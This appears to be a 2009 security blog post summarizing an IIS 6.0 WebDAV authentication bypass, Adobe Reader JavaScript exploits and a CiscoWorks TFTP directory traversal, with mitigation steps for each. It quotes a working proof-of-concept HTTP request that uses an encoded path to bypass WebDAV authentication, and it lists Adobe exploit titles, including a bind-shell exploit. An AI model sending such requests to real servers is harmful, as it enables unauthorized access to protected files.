IIS 6.0 WebDav Exploit, Adobe 8-9.1 JavaScript Exploits, Cisco Works TFTPD Directory Traversal
Microsoft IIS 6.0 with Webdav is vulnerable to an authentication bypass vulnerability. The exploit has already been made public:
http://www.milw0rm.com/exploits/8704
Proof of concept taken from above URL:
GET /prot%c0%afected/protected.zip HTTP/1.1 Translate: f Connection: close Host: servername
Adobe version 8-9.1 have been smacked with more JavaScript command execution bugs. A lot of vendors are starting to recommend disabling JavaScript, something I suggested back in 2007 when I released the Adobe JavaScript DB backdoor. Here are links to the 5 Adobe exploits released on Milw0rm thus far (2009):
| 2009-05-04 | Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit | 7501 | R | D | Abysssec | ||
| 2009-04-29 | Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit | 8078 | R | D | Arr1val | ||
| 2009-04-29 | Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit | 7579 | R | D | Arr1val | ||
| 2009-03-24 | Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 | 8153 | R | D | Black Security | ||
| 2009-02-23 | Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day | 26871 | R | D | Guido Landi |
You can disable Adobe Javascript as follows:
1. Launch Acrobat or Adobe Reader.
2. Select Edit>Preferences
3. Select the JavaScript Category
4. Uncheck the ‘Enable Acrobat JavaScript’ option
5. Click OK
Products that have TFTP services enabled and that run CiscoWorks
Common Services versions 3.0.x, 3.1.x, and 3.2.x are vulnerable.
Only CiscoWorks Common Services systems running on Microsoft Windows
operating systems are affected.
CiscoWorks TFTP Directory Traversal Vulnerability. According to Cisco the following software types and versions are vulnerable:
- Cisco Unified Service Monitor versions 1.0, 1.1, 2.0, and 2.1
- CiscoWorks QoS Policy Manager versions 4.0 and 4.1
- CiscoWorks LAN Management Solution versions 2.5, 2.6, and 3.0
- Cisco Security Manager versions 3.0, 3.1, and 3.2
- Cisco TelePresence Readiness Assessment Manager version 1.0
- CiscoWorks Voice Manager versions 3.0 and 3.1
- CiscoWorks Heath and Utilization Monitor versions 1.0 and 1.1
- Cisco Unified Operations Manager versions 1.0, 1.1, 2.0 and 2.1
- Cisco Unified Provisioning Manager versions 1.0, 1.1, 1.2 and 1.3
Workarounds
To mitigate this vulnerability, administrators can disable TFTP services by completing the following steps:
Step 1. Choose “Start > Settings > Control Panel > Administrative Tools > Services to access the Services window.
Step 2. Right-click “CWCS tftp service” and select “Properties”.
Step 3. Set the “Startup Type” to “Disabled”.
Step 4. Click the “Stop” button to stop the TFTP service.
Still waiting for details on a proof of concept for this.
If you enjoyed this post, please leave a comment or subscribe to the feed and get future articles delivered to your feed reader.
No comments yet.
Leave a comment